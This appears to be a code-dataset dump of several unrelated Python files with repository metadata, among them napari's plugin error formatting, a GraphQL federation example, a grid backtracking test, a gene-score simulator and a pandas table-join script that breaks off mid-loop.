row.append({'value': name_value.get(h, '')})
final_result['data'].append(row)
results.append(final_result)
return 'list_tickets.html'
| 38.350649
| 95
| 0.562817
| 343
| 2,953
| 4.734694
| 0.346939
| 0.036946
| 0.034483
| 0.042488
| 0.142241
| 0.142241
| 0.142241
| 0.10899
| 0.10899
| 0.10899
| 0
| 0.006927
| 0.315611
| 2,953
| 76
| 96
| 38.855263
| 0.796635
| 0.196072
| 0
| 0.192308
| 0
| 0
| 0.12802
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c96886f093360dec7c0ce79819456ac3947c46e0
| 12,198
|
py
|
Python
|
napari/plugins/exceptions.py
|
yinawang28/napari
|
6ea95a9fa2f9150a4dbb5ec1286b8ff2020c3957
|
[
"BSD-3-Clause"
] | null | null | null |
napari/plugins/exceptions.py
|
yinawang28/napari
|
6ea95a9fa2f9150a4dbb5ec1286b8ff2020c3957
|
[
"BSD-3-Clause"
] | null | null | null |
napari/plugins/exceptions.py
|
yinawang28/napari
|
6ea95a9fa2f9150a4dbb5ec1286b8ff2020c3957
|
[
"BSD-3-Clause"
] | null | null | null |
import re
import sys
from collections import defaultdict
from types import TracebackType
from typing import (
Callable,
DefaultDict,
Dict,
Generator,
List,
Optional,
Tuple,
Type,
Union,
)
# This is a mapping of plugin_name -> PluginError instances
# all PluginErrors get added to this in PluginError.__init__
PLUGIN_ERRORS: DefaultDict[str, List['PluginError']] = defaultdict(list)
# standard tuple type returned from sys.exc_info()
ExcInfoTuple = Tuple[Type[Exception], Exception, Optional[TracebackType]]
if sys.version_info >= (3, 8):
from importlib import metadata as importlib_metadata
else:
import importlib_metadata
Distribution = importlib_metadata.Distribution
class PluginError(Exception):
"""Base class for all plugin-related errors.
Instantiating a PluginError (whether raised or not), adds the exception
instance to the PLUGIN_ERRORS dict for later retrieval.
Parameters
----------
message : str
A message for the exception
plugin_name : str
The name of the plugin that had the error
plugin_module : str
The module of the plugin that had the error
"""
def __init__(self, message: str, plugin_name: str, plugin_module: str):
super().__init__(message)
self.plugin_name = plugin_name
self.plugin_module = plugin_module
PLUGIN_ERRORS[plugin_name].append(self)
def format_with_contact_info(self) -> str:
"""Make formatted string with context and contact info if possible."""
# circular imports
from napari import __version__
msg = f'\n\nPluginError: {self}'
msg += '\n(Use "Plugins > Plugin errors..." to review/report errors.)'
if self.__cause__:
cause = str(self.__cause__).replace("\n", "\n" + " " * 13)
msg += f'\n Cause was: {cause}'
contact = fetch_module_metadata(self.plugin_module)
if contact:
extra = [f'{k: >11}: {v}' for k, v in contact.items()]
extra += [f'{"napari": >11}: v{__version__}']
msg += "\n".join(extra)
msg += '\n'
return msg
def info(self,) -> ExcInfoTuple:
"""Return info as would be returned from sys.exc_info()."""
return (self.__class__, self, self.__traceback__)
class PluginImportError(PluginError, ImportError):
"""Raised when a plugin fails to import."""
def __init__(self, plugin_name: str, plugin_module: str):
msg = f"Failed to import plugin: '{plugin_name}'"
super().__init__(msg, plugin_name, plugin_module)
class PluginRegistrationError(PluginError):
"""Raised when a plugin fails to register with pluggy."""
def __init__(self, plugin_name: str, plugin_module: str):
msg = f"Failed to register plugin: '{plugin_name}'"
super().__init__(msg, plugin_name, plugin_module)
def format_exceptions(plugin_name: str, as_html: bool = False):
"""Return formatted tracebacks for all exceptions raised by plugin.
Parameters
----------
plugin_name : str
The name of a plugin for which to retrieve tracebacks.
as_html : bool
Whether to return the exception string as formatted html,
defaults to False.
Returns
-------
str
A formatted string with traceback information for every exception
raised by ``plugin_name`` during this session.
"""
_plugin_errors: List[PluginError] = PLUGIN_ERRORS.get(plugin_name)
if not _plugin_errors:
return ''
from napari import __version__
format_exc_info = get_tb_formatter()
_linewidth = 80
_pad = (_linewidth - len(plugin_name) - 18) // 2
msg = [
f"{'=' * _pad} Errors for plugin '{plugin_name}' {'=' * _pad}",
'',
f'{"napari version": >16}: {__version__}',
]
err0 = _plugin_errors[0]
package_meta = fetch_module_metadata(err0.plugin_module)
if package_meta:
msg.extend(
[
f'{"plugin package": >16}: {package_meta["package"]}',
f'{"version": >16}: {package_meta["version"]}',
f'{"module": >16}: {err0.plugin_module}',
]
)
msg.append('')
for n, err in enumerate(_plugin_errors):
_pad = _linewidth - len(str(err)) - 10
msg += ['', f'ERROR #{n + 1}: {str(err)} {"-" * _pad}', '']
msg.append(format_exc_info(err.info(), as_html))
msg.append('=' * _linewidth)
return ("<br>" if as_html else "\n").join(msg)
def get_tb_formatter() -> Callable[[ExcInfoTuple, bool], str]:
"""Return a formatter callable that uses IPython VerboseTB if available.
Imports IPython lazily if available to take advantage of ultratb.VerboseTB.
If unavailable, cgitb is used instead, but this function overrides a lot of
the hardcoded citgb styles and adds error chaining (for exceptions that
result from other exceptions).
Returns
-------
callable
A function that accepts a 3-tuple and a boolean ``(exc_info, as_html)``
and returns a formatted traceback string. The ``exc_info`` tuple is of
the ``(type, value, traceback)`` format returned by sys.exc_info().
The ``as_html`` determines whether the traceback is formated in html
or plain text.
"""
try:
import IPython.core.ultratb
def format_exc_info(info: ExcInfoTuple, as_html: bool) -> str:
color = 'Linux' if as_html else 'NoColor'
vbtb = IPython.core.ultratb.VerboseTB(color_scheme=color)
if as_html:
ansi_string = vbtb.text(*info).replace(" ", " ")
html = "".join(ansi2html(ansi_string))
html = html.replace("\n", "<br>")
html = (
"<span style='font-family: monaco,courier,monospace;'>"
+ html
+ "</span>"
)
return html
else:
return vbtb.text(*info)
except ImportError:
import cgitb
import traceback
# cgitb does not support error chaining...
# see https://www.python.org/dev/peps/pep-3134/#enhanced-reporting
# this is a workaround
def cgitb_chain(exc: Exception) -> Generator[str, None, None]:
"""Recurse through exception stack and chain cgitb_html calls."""
if exc.__cause__:
yield from cgitb_chain(exc.__cause__)
yield (
'<br><br><font color="#51B432">The above exception was '
'the direct cause of the following exception:</font><br>'
)
elif exc.__context__:
yield from cgitb_chain(exc.__context__)
yield (
'<br><br><font color="#51B432">During handling of the '
'above exception, another exception occurred:</font><br>'
)
yield cgitb_html(exc)
def cgitb_html(exc: Exception) -> str:
"""Format exception with cgitb.html."""
info = (type(exc), exc, exc.__traceback__)
return cgitb.html(info)
def format_exc_info(info: ExcInfoTuple, as_html: bool) -> str:
if as_html:
html = "\n".join(cgitb_chain(info[1]))
# cgitb has a lot of hardcoded colors that don't work for us
# remove bgcolor, and let theme handle it
html = re.sub('bgcolor="#.*"', '', html)
# remove superfluous whitespace
html = html.replace('<br>\n', '\n')
# but retain it around the <small> bits
html = re.sub(r'(<tr><td><small.*</tr>)', f'<br>\\1<br>', html)
# weird 2-part syntax is a workaround for hard-to-grep text.
html = html.replace(
"<p>A problem occurred in a Python script. "
"Here is the sequence of",
"",
)
html = html.replace(
"function calls leading up to the error, "
"in the order they occurred.</p>",
"<br>",
)
# remove hardcoded fonts
html = html.replace('face="helvetica, arial"', "")
html = (
"<span style='font-family: monaco,courier,monospace;'>"
+ html
+ "</span>"
)
return html
else:
# if we don't need HTML, just use traceback
return ''.join(traceback.format_exception(*info))
return format_exc_info
def fetch_module_metadata(dist: Union[Distribution, str]) -> Dict[str, str]:
"""Attempt to retrieve name, version, contact email & url for a package.
Parameters
----------
distname : str or Distribution
Distribution object or name of a distribution. If a string, it must
match the *name* of the package in the METADATA file... not the name of
the module.
Returns
-------
package_info : dict
A dict with metadata about the package
Returns None of the distname cannot be found.
"""
if isinstance(dist, Distribution):
meta = dist.metadata
else:
try:
meta = importlib_metadata.metadata(dist)
except importlib_metadata.PackageNotFoundError:
return {}
return {
'package': meta.get('Name', ''),
'version': meta.get('Version', ''),
'summary': meta.get('Summary', ''),
'url': meta.get('Home-page') or meta.get('Download-Url', ''),
'author': meta.get('Author', ''),
'email': meta.get('Author-Email') or meta.get('Maintainer-Email', ''),
'license': meta.get('License', ''),
}
ANSI_STYLES = {
1: {"font_weight": "bold"},
2: {"font_weight": "lighter"},
3: {"font_weight": "italic"},
4: {"text_decoration": "underline"},
5: {"text_decoration": "blink"},
6: {"text_decoration": "blink"},
8: {"visibility": "hidden"},
9: {"text_decoration": "line-through"},
30: {"color": "black"},
31: {"color": "red"},
32: {"color": "green"},
33: {"color": "yellow"},
34: {"color": "blue"},
35: {"color": "magenta"},
36: {"color": "cyan"},
37: {"color": "white"},
}
def ansi2html(
ansi_string: str, styles: Dict[int, Dict[str, str]] = ANSI_STYLES
) -> Generator[str, None, None]:
"""Convert ansi string to colored HTML
Parameters
----------
ansi_string : str
text with ANSI color codes.
styles : dict, optional
A mapping from ANSI codes to a dict of css kwargs:values,
by default ANSI_STYLES
Yields
-------
str
HTML strings that can be joined to form the final html
"""
previous_end = 0
in_span = False
ansi_codes = []
ansi_finder = re.compile("\033\\[" "([\\d;]*)" "([a-zA-z])")
for match in ansi_finder.finditer(ansi_string):
yield ansi_string[previous_end : match.start()]
previous_end = match.end()
params, command = match.groups()
if command not in "mM":
continue
try:
params = [int(p) for p in params.split(";")]
except ValueError:
params = [0]
for i, v in enumerate(params):
if v == 0:
params = params[i + 1 :]
if in_span:
in_span = False
yield "</span>"
ansi_codes = []
if not params:
continue
ansi_codes.extend(params)
if in_span:
yield "</span>"
in_span = False
if not ansi_codes:
continue
style = [
"; ".join([f"{k}: {v}" for k, v in styles[k].items()]).strip()
for k in ansi_codes
if k in styles
]
yield '<span style="%s">' % "; ".join(style)
in_span = True
yield ansi_string[previous_end:]
if in_span:
yield "</span>"
in_span = False
| 33.237057
| 79
| 0.565175
| 1,413
| 12,198
| 4.719038
| 0.251239
| 0.026995
| 0.011698
| 0.005399
| 0.128374
| 0.104979
| 0.080084
| 0.072286
| 0.063887
| 0.063887
| 0
| 0.009423
| 0.312674
| 12,198
| 366
| 80
| 33.327869
| 0.785902
| 0.251599
| 0
| 0.205357
| 0
| 0
| 0.175482
| 0.019296
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058036
| false
| 0
| 0.080357
| 0
| 0.205357
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9693a49a18c1714e3e73fb34025f16a983d9fca
| 572
|
py
|
Python
|
examples/federation/account.py
|
syfun/starlette-graphql
|
1f57b60a9699bc6a6a2b95d5596ffa93ef13c262
|
[
"MIT"
] | 14
|
2020-04-03T08:18:21.000Z
|
2021-11-10T04:39:45.000Z
|
examples/federation/account.py
|
syfun/starlette-graphql
|
1f57b60a9699bc6a6a2b95d5596ffa93ef13c262
|
[
"MIT"
] | 2
|
2021-08-31T20:25:23.000Z
|
2021-09-21T14:40:56.000Z
|
examples/federation/account.py
|
syfun/starlette-graphql
|
1f57b60a9699bc6a6a2b95d5596ffa93ef13c262
|
[
"MIT"
] | 1
|
2020-08-27T17:04:29.000Z
|
2020-08-27T17:04:29.000Z
|
import uvicorn
from gql import gql, reference_resolver, query
from stargql import GraphQL
from helper import get_user_by_id, users
type_defs = gql("""
type Query {
me: User
}
type User @key(fields: "id") {
id: ID!
name: String
username: String
}
""")
@query('me')
def get_me(_, info):
return users[0]
@reference_resolver('User')
def user_reference(_, info, representation):
return get_user_by_id(representation['id'])
app = GraphQL(type_defs=type_defs, federation=True)
if __name__ == '__main__':
uvicorn.run(app, port=8082)
| 16.342857
| 51
| 0.687063
| 79
| 572
| 4.683544
| 0.455696
| 0.064865
| 0.048649
| 0.059459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010799
| 0.190559
| 572
| 34
| 52
| 16.823529
| 0.788337
| 0
| 0
| 0
| 0
| 0
| 0.241259
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.173913
| 0.086957
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c96af4a490471a665152773f8f3b2a90f985672a
| 607
|
py
|
Python
|
tests/backtracking/test_path_through_grid.py
|
davjohnst/fundamentals
|
f8aff4621432c3187305dd04563425f54ea08495
|
[
"Apache-2.0"
] | null | null | null |
tests/backtracking/test_path_through_grid.py
|
davjohnst/fundamentals
|
f8aff4621432c3187305dd04563425f54ea08495
|
[
"Apache-2.0"
] | null | null | null |
tests/backtracking/test_path_through_grid.py
|
davjohnst/fundamentals
|
f8aff4621432c3187305dd04563425f54ea08495
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from unittest import TestCase
from fundamentals.backtracking.path_through_grid import PathThroughGrid
class TestPathThroughGrid(TestCase):
def test_no_path(self):
grid = [
[0, 1, 0],
[1, 0, 1],
[0, 0, 1]
]
ptg = PathThroughGrid(grid)
self.assertIsNone(ptg.get_path())
def test_path(self):
grid = [
[1, 1, 0],
[1, 1, 1],
[0, 0, 1]
]
ptg = PathThroughGrid(grid)
self.assertEquals([(0, 0), (0, 1), (1, 1), (1, 2), (2, 2)],ptg.get_path())
| 22.481481
| 82
| 0.507414
| 74
| 607
| 4.067568
| 0.364865
| 0.046512
| 0.0299
| 0.026578
| 0.215947
| 0.199336
| 0.199336
| 0.199336
| 0
| 0
| 0
| 0.070352
| 0.344316
| 607
| 27
| 82
| 22.481481
| 0.68593
| 0.032949
| 0
| 0.315789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.105263
| false
| 0
| 0.105263
| 0
| 0.263158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c96b923ab99cdd18285399edd12e8dfeb03b5f78
| 343
|
py
|
Python
|
main.py
|
yukraven/vitg
|
27d3d9b73a23e4ff5ff4c769eb1f26b8f57fee72
|
[
"MIT"
] | null | null | null |
main.py
|
yukraven/vitg
|
27d3d9b73a23e4ff5ff4c769eb1f26b8f57fee72
|
[
"MIT"
] | 63
|
2019-08-25T07:48:54.000Z
|
2019-10-18T01:52:29.000Z
|
main.py
|
yukraven/vitg
|
27d3d9b73a23e4ff5ff4c769eb1f26b8f57fee72
|
[
"MIT"
] | null | null | null |
import sqlite3
import Sources.Parser
conn = sqlite3.connect("Database/vitg.db")
cursor = conn.cursor()
cursor.execute("SELECT * FROM Locations")
results = cursor.fetchall()
print(results)
conn.close()
parser = Sources.Parser.Parser()
words = [u"любить", u"бить"]
for word in words:
command = parser.getCommand(word)
print(command)
| 19.055556
| 42
| 0.725948
| 45
| 343
| 5.533333
| 0.6
| 0.104418
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006734
| 0.134111
| 343
| 17
| 43
| 20.176471
| 0.83165
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0.153846
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c96d512247f8395a641feee824bc046d0dbdc522
| 7,018
|
py
|
Python
|
src/gene.score.array.simulator.py
|
ramachandran-lab/PEGASUS-WINGS
|
bdd81b58be4c4fb62916e422a854abdcbfbb6fd7
|
[
"MIT"
] | 3
|
2019-03-31T12:32:25.000Z
|
2020-01-04T20:57:14.000Z
|
src/gene.score.array.simulator.py
|
ramachandran-lab/PEGASUS-WINGS
|
bdd81b58be4c4fb62916e422a854abdcbfbb6fd7
|
[
"MIT"
] | null | null | null |
src/gene.score.array.simulator.py
|
ramachandran-lab/PEGASUS-WINGS
|
bdd81b58be4c4fb62916e422a854abdcbfbb6fd7
|
[
"MIT"
] | 1
|
2020-10-24T23:48:15.000Z
|
2020-10-24T23:48:15.000Z
|
import numpy as np
import pandas as pd
import sys
import string
import time
import subprocess
from collections import Counter
import string
import random
def random_pheno_generator(size=6,chars=string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))
#First argument is the gene score distribution that you want to draw from, the second is the type of clusters to generate
#If 'large' only clusters with a large number of shared genes will be simulated
#If 'mixed' one cluster with only a few shared genes will be simulated
subprocess.call('mkdir NewSims_nothreshenforced',shell = True)
if len(sys.argv) < 3:
sys.exit("Enter the ICD10 code of interest as the first argument, and either 'mixed' or 'large' as the second argument depending on desired number of significant genes in a cluster.")
class simulator():
def __init__(self,type_of_clusters,num_draws,sim_status,percentage,sim_label):
self.example_dist = pd.read_csv('merged.pegasus.results.'+ sys.argv[1] + '.txt', delimiter = '\t').set_index('Gene')
self.genes = np.array(self.example_dist.index.tolist())
self.num_clusters = int(np.random.uniform(2,int(num_draws) * 0.15))
# self.num_clusters = int(np.random.uniform(2,3))
self.phenos = np.array([random_pheno_generator() for i in range(num_draws)])
self.clusters = {}
self.unique_sig_genes = {}
self.cluster_type = type_of_clusters
self.percentage = float(percentage)/100
self.draw_status = sim_status
self.sim_label = sim_label
if self.draw_status == 'limited':
self.num_draws = num_draws
else:
self.num_draws == 100000000000
def _gen_clusters_(self):
self.possible_genes = list(self.genes)
self.possible_phenos = list(self.phenos)
total_genes = 175
self.ref_count = {}
for i in range(self.num_clusters):
#Set size of clusters, both number of phenos and sig genes
num_sig_shared_genes = int(total_genes*self.percentage)
genes,phenos = self.cluster_sharing(num_sig_shared_genes,np.random.randint(2,8),self.possible_genes,self.possible_phenos)
#Update sets of genes and phenos so that there is not overlap between the clusters (first run)
self.possible_phenos = list(set(self.possible_phenos).difference(phenos))
self.possible_genes = list(set(self.possible_genes).difference(genes))
self.clusters['cluster' + str(i)] = {'Gene':list(genes),'Phenos':list(phenos)}
for j in phenos:
self.ref_count[str(j)] = len(genes)
for i in self.phenos:
if i not in self.ref_count.keys():
self.ref_count[i] = 0
self.unique_genes(self.phenos)
def cluster_sharing(self,num_unique_genes,num_unique_phenos,possible_genes,possible_phenos):
genes = set()
while len(genes) < num_unique_genes:
genes.add(np.random.choice(possible_genes))
phenos = set()
while len(phenos) < num_unique_phenos:
phenos.add(np.random.choice(possible_phenos))
return genes,phenos
def draw_counter(self,gene_dict,selected_genes):
if self.draw_status == 'limited':
for i in selected_genes:
gene_dict[i] +=1
for x,y in gene_dict.items():
if y >= self.num_draws:
del gene_dict[x]
return gene_dict
else:
return gene_dict
#Generates a list of genes that are also significant for each phenotype, whether or not they have been assigned to a cluster
def unique_genes(self,phenos):
self.counter_dict = {}
for i in self.possible_genes:
self.counter_dict[i] = 0
for pheno in phenos:
self.number_siggenes = 175
pheno_only_genes = np.random.choice(self.possible_genes, size = int(self.number_siggenes - self.ref_count[pheno]),replace = False)
self.counter_dict = self.draw_counter(self.counter_dict,pheno_only_genes)
self.unique_sig_genes[pheno] = list(set(pheno_only_genes))
self.possible_genes = list(self.counter_dict.keys())
def generate_matrix(self):
all_scores = np.array(self.example_dist).flatten()
small_scores = all_scores[all_scores <= 0.001]
non_sig_scores = all_scores[all_scores > 0.001]
data = np.zeros((len(self.phenos),len(self.genes)))
for j in range(len(self.phenos)):
data[j] = np.negative(np.log(np.array(np.random.choice(non_sig_scores,len(self.genes)))))
scorematrix = pd.DataFrame(data.T,index = self.genes,columns = self.phenos)
for key,value in self.clusters.items():
for phenotype in value['Phenos']:
for gene in value['Gene']:
self.unique_sig_genes[phenotype].append(gene)
#Fill in significant gene scores that are unique to each phenotype
for key,value in self.unique_sig_genes.items():
for x in value:
scorematrix.loc[x,key] = np.negative(np.log(np.random.choice(small_scores)))
return scorematrix
def write(self,dataframe):
if self.draw_status == 100000000000:
y = str(self.percentage) + '_' + str(self.sim_label)
subprocess.call('mkdir NewSims_nothreshenforced/Simulations' + y+str(self.num_clusters),shell = True)
dataframe = dataframe*-1
dataframe = 10**dataframe.astype(float)
dataframe.index.name = 'Gene'
dataframe.to_csv('NewSims_nothreshenforced/Simulations'+y+str(self.num_clusters)+'/Simulated.scores.using.' + sys.argv[1] + '.gene.dist.' + y + '.csv', header = True, index = True)
for key,value in self.clusters.items():
newfile = open('NewSims_nothreshenforced/Simulations'+y+str(self.num_clusters)+ '/' + str(key) + 'gene.and.pheno.info.txt','w')
newfile.write('Shared Significant Genes:\n')
newfile.write(','.join(value["Gene"]))
newfile.write('\nPhenos:\n')
newfile.write(','.join(value['Phenos']))
else:
y = str(self.percentage) + '_' + str(self.sim_label)
subprocess.call('mkdir NewSims_nothreshenforced/Simulations' + y + '_num_draws_' + str(self.num_draws),shell = True)
dataframe = dataframe*-1
dataframe = 10**dataframe.astype(float)
dataframe.index.name = 'Gene'
dataframe.to_csv('NewSims_nothreshenforced/Simulations'+y+ '_num_draws_' + str(self.num_draws) + '/Simulated.scores.using.' + sys.argv[1] + '.gene.dist.' + str(self.num_clusters) + '.clusters.' + str(self.num_draws)+'.pos.draws.csv', header = True, index = True)
for key,value in self.clusters.items():
newfile = open('NewSims_nothreshenforced/Simulations'+y+ '_num_draws_' + str(self.num_draws)+ '/' + str(key) + 'gene.and.pheno.info.txt','w')
newfile.write('Shared Significant Genes:\n')
newfile.write(','.join(value["Gene"]))
newfile.write('\nPhenos:\n')
newfile.write(','.join(value['Phenos']))
def test(self):
self._gen_clusters_()
self.write(self.generate_matrix())
def main():
#each item of z is the number of phenotypes in a simulation
for z in [25,50,75,100]:
#The amount of shared significant architecture to be imposed on a cluster
shared_percentage = [1,10,25,50,75]
for g in shared_percentage:
#How many simulations for each set of parameters should be run
for j in range(1,1001):
print('Generated ' + str(g) + '% with unlimited random draws simulation,' +str(z) + ' phenotypes: ' + str(j))
limiteddraw = simulator(sys.argv[2],z,'limited',g,j)
limiteddraw.test()
main()
| 43.320988
| 265
| 0.727273
| 1,063
| 7,018
| 4.650047
| 0.206021
| 0.021242
| 0.016185
| 0.042484
| 0.319644
| 0.251871
| 0.251871
| 0.234473
| 0.195226
| 0.195226
| 0
| 0.014769
| 0.141351
| 7,018
| 161
| 266
| 43.590062
| 0.805509
| 0.120262
| 0
| 0.215385
| 0
| 0.007692
| 0.140399
| 0.057945
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.069231
| 0.007692
| 0.192308
| 0.007692
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c97156d460bdc88e5f228d10d1465d45738af933
| 8,536
|
py
|
Python
|
other_useful_scripts/join.py
|
sklasfeld/ChIP_Annotation
|
9ce9db7a129bfdec91ec23b33d73ff22f37408ad
|
[
"MIT"
] | 1
|
2020-08-23T23:12:56.000Z
|
2020-08-23T23:12:56.000Z
|
other_useful_scripts/join.py
|
sklasfeld/ChIP_Annotation
|
9ce9db7a129bfdec91ec23b33d73ff22f37408ad
|
[
"MIT"
] | null | null | null |
other_useful_scripts/join.py
|
sklasfeld/ChIP_Annotation
|
9ce9db7a129bfdec91ec23b33d73ff22f37408ad
|
[
"MIT"
] | 1
|
2020-08-23T23:16:47.000Z
|
2020-08-23T23:16:47.000Z
|
#!/usr/bin/env python3
# -*- coding: iso-8859-15 -*-
# 2017, Samantha Klasfeld, the Wagner Lab
# the Perelman School of Medicine, the University of Pennsylvania
# Samantha Klasfeld, 12-21-2017
import argparse
import sys
import pandas as pd
import numpy as np
parser = argparse.ArgumentParser(description="this script takes \
in a 2 tables and performs a \
joins them to create a merged table")
parser.add_argument('left_table', help='left table file name')
parser.add_argument('right_table', help='right table file name')
parser.add_argument('out_table', help='output table file name')
parser.add_argument('-w','--how', help='Type of merge to be performed: \
`left`,`right`,`outer`,`inner`, `antileft`. Default:`inner`',
choices=['left', 'right', 'outer', 'inner', 'antileft'], default='inner')
parser.add_argument('-j','--on', help='Column or index level names \
to join on. These must be found in both DataFrames. If on is None \
and not merging on indexes then this defaults to the intersection \
of the columns in both DataFrames.', nargs='+')
parser.add_argument('-lo','--left_on', help='Column or index level names \
to join on in the left DataFrame. Can also be an array or list of arrays \
of the length of the left DataFrame. These arrays are treated as if \
they are columns.', nargs='+')
parser.add_argument('-ro','--right_on', help='Column or index level names \
to join on in the right DataFrame. Can also be an array or list of arrays \
of the length of the left DataFrame. These arrays are treated as if \
they are columns.', nargs='+')
parser.add_argument('-ml','--merge_left_index', help='Use the index from the left \
DataFrame as the join key(s). If it is a MultiIndex, the number of keys \
in the other DataFrame (either the index or a number of columns) must \
match the number of levels.', action='store_true', default=False)
parser.add_argument('-mr','--merge_right_index', help='Use the index from the right \
DataFrame as the join key(s). If it is a MultiIndex, the number of keys \
in the other DataFrame (either the index or a number of columns) must \
match the number of levels.', action='store_true', default=False)
parser.add_argument('-or','--order', help='Order the join keys \
lexicographically in the result DataFrame. If False, the \
order of the join keys depends on the join type (how keyword).', \
action='store_true', default=False)
parser.add_argument('-su','--suffixes', help='Tuple of (str,str). Each str is a \
Suffix to apply to overlapping column names in the left and right side, \
respectively. To raise an exception on overlapping columns \
use (False, False). Default:(`_x`,`_y`)', nargs=2)
parser.add_argument('-nl', '--noheader_l', action='store_true', default=False, \
help='Set if `left_table` has no header. If this is set, \
user must also set `colnames_l`')
parser.add_argument('-nr', '--noheader_r', action='store_true', default=False, \
help='Set if `right_table` has no header. If this is set, \
user must also set `colnames_r`')
parser.add_argument('-cl', '--colnames_l', nargs='+', \
help='`If `noheader_l` is set, add column names \
to `left_table`. Otherwise, rename the columns.')
parser.add_argument('-cr', '--colnames_r', nargs='+', \
help='`If `noheader_r` is set, add column names \
to `right_table`. Otherwise, rename the columns.')
parser.add_argument('--left_sep', '-sl', default="\t", \
help='table delimiter of `left_table`. By default, \
the table is expected to be tab-delimited')
parser.add_argument('--right_sep', '-sr', default="\t", \
help='table delimiter of `right_table`. By default, \
the table is expected to be tab-delimited')
parser.add_argument('--out_sep', '-so', default="\t", \
help='table delimiter of `out_table`. By default, \
the out table will be tab-delimited')
parser.add_argument('--left_indexCol', '-il', \
help='Column(s) to use as the row labels of the \
`left_table`, either given as string name or column index.')
parser.add_argument('--right_indexCol', '-ir', \
help='Column(s) to use as the row labels of the \
`right_table`, either given as string name or column index.')
parser.add_argument('-clc','--change_left_cols', nargs='+',
help='list of specific column names you want to change in left table. \
For example, if you want to change columns `oldColName1` and \
`oldColName2` to `newColName1` \
and `newColName2`, respectively, then set this to \
`oldColName2,newColName1 oldColName2,newColName2`')
parser.add_argument('-crc','--change_right_cols', nargs='+',
help='list of specific column names you want to change in right table. \
For example, if you want to change columns `oldColName1` and \
`oldColName2` to `newColName1` \
and `newColName2`, respectively, then set this to \
`oldColName2,newColName1 oldColName2,newColName2`')
#parser.add_argument('--header','-H', action='store_true', default=False, \
# help='true if header in table')
args = parser.parse_args()
if args.noheader_l and not args.colnames_l:
sys.exit("Error: If `noheader_l` is set, user must also set `colnames_l`\n")
if args.noheader_r and not args.colnames_r:
sys.exit("Error: If `noheader_r` is set, user must also set `colnames_r`\n")
if args.change_left_cols and args.colnames_l:
sys.exit("Error: Can only set one of these parameters:\n" +
"\t* change_left_cols\n"+
"\t* colnames_l\n")
if args.change_right_cols and args.colnames_r:
sys.exit("Error: Can only set one of these parameters:\n" +
"\t* change_right_cols\n"+
"\t* colnames_r\n")
if not args.on:
if not args.left_on and not args.right_on:
sys.exit("Error: must set columns to join on.")
# 1. Read input files
read_ltable_param={}
read_rtable_param={}
read_ltable_param["sep"]=args.left_sep
read_rtable_param["sep"]=args.right_sep
if args.noheader_l:
read_ltable_param["header"]=None
if args.noheader_r:
read_rtable_param["header"]=None
if args.left_indexCol:
read_ltable_param["index_col"]=args.left_indexCol
if args.right_indexCol:
read_rtable_param["index_col"]=args.right_indexCol
left_df = pd.read_csv(args.left_table, **read_ltable_param)
right_df = pd.read_csv(args.right_table, **read_rtable_param)
# 2. Change/Update column names of the input tables
if args.colnames_l:
if len(left_df.columns) != len(args.colnames_l):
sys.exit(("ValueError: Length mismatch: Expected axis " +
"has %i elements, new values have %i elements") %
(len(left_df.columns), len(args.colnames_l)))
left_df.columns = args.colnames_l
if args.colnames_r:
if len(right_df.columns) != len(args.colnames_r):
sys.exit(("ValueError: Length mismatch: Expected axis " +
"has %i elements, new values have %i elements") %
(len(right_df.columns), len(args.colnames_r)))
right_df.columns = args.colnames_r
if args.change_left_cols:
for left_changeCol_param in args.change_left_cols:
if len(left_changeCol_param.split(",")) != 2:
sys.exit("ERROR: values set to `change_left_cols` must " +
"be in the format [old_col_name],[new_column_name]")
rename_left_cols = dict(x.split(",") for x in args.change_left_cols)
left_df = left_df.rename(columns=rename_left_cols)
if args.change_right_cols:
for right_changeCol_param in args.change_right_cols:
